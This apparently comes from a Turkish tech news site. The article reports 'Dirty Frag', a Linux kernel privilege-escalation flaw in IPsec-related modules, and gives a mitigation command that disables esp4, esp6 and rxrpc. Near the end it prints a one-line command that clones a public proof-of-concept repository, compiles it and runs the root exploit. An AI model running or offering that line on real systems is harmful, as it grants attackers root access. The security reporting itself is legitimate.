Hemen Eticaret Sitenizi Kurun...
Linux Dünyasında Yeni Tehdit: Dirty Frag Güvenlik Açığı

Linux Dünyasında Yeni Tehdit: Dirty Frag Güvenlik Açığı

📅 09.05.2026 09:10 👁 56 görüntülenme


Linux sunucu ekosistemini sarsan yeni bir güvenlik açığı gündemde. Dirty Frag adı verilen bu açık, 2017’den beri neredeyse tüm Linux kurulumlarını etkiliyor ve saldırganlara anında root erişimi sağlıyor. Üstelik şu anda herhangi bir resmi yama bulunmuyor.

📌 Açığın Özellikleri

  • Kapsam: Ubuntu (24 ve 26), Arch, RHEL, OpenSUSE, CentOS Stream, Fedora, AlmaLinux ve hatta WSL2 dahil olmak üzere popüler dağıtımların güncel sürümleri etkileniyor.

  • Çalışma Mekanizması: Copy Fail açığına benzer şekilde, sıfır kopyalama işlemi sırasında sayfa önbellek tanımlayıcısının istismar edilmesine dayanıyor. Bu kez hataya açık kod, IPSec ile ilgili modüllerde bulunuyor.

  • Tehlike: Basit bir mantık hatası olduğundan belirli sistem koşullarına veya zamanlamaya bağlı değil. Küçük bir program çalıştırmak yeterli.

⚠️ Neden Hazırlıksız Yakalandık?

Dirty Frag, 30 Nisan’da Linux çekirdek ekibine bildirilmişti. Ancak bir “bağımsız üçüncü tarafın” ambargoyu ihlal etmesiyle kamuya açık hale geldi. Bu nedenle yamalar hazırlanıp dağıtılmadan açık duyurulmuş oldu. Güvenlik uzmanları, açığın kötü niyetli kişiler tarafından aktif olarak kullanılıyor olabileceğini değerlendiriyor.

🛡️ Geçici Çözüm

Henüz resmi bir yama bulunmasa da sistem yöneticileri aşağıdaki modülleri devre dışı bırakarak riski azaltabiliyor:

  • esp4

  • esp6

  • rxrpc

Komut:
sh -c "printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' > /etc/modprobe.d/dirtyfrag.conf; rmmod esp4 esp6 rxrpc 2>/dev/null; true"

Bu modüller IPSec ağ iletişimiyle ilgili olduğundan, IPSec istemcisi veya sunucusu olmayan sistemlerde devre dışı bırakılmaları işleyişi etkilemiyor.

🔍 Test Etmek İsteyenler İçin

PoC kodu GitHub’da yayımlandı:
git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp

🎯 Sonuç Olarak

Dirty Frag, Linux dünyasında son yılların en kritik güvenlik açıklarından biri olarak değerlendiriliyor. Sistem yöneticilerinin güncellemeleri yakından takip etmesi ve yamalar yayınlandığında derhal uygulaması büyük önem taşıyor.

Haberi nasıl buldunuz?
Bir reaksiyona tıklayarak oy verebilirsiniz.

Yorumlar (0)

Topluluğumuzla düşüncelerinizi paylaşın.

Henüz yorum yapılmamış. İlk yorumu sen yaz!

Yorum yapabilmek için giriş yap.

Üye değil misin?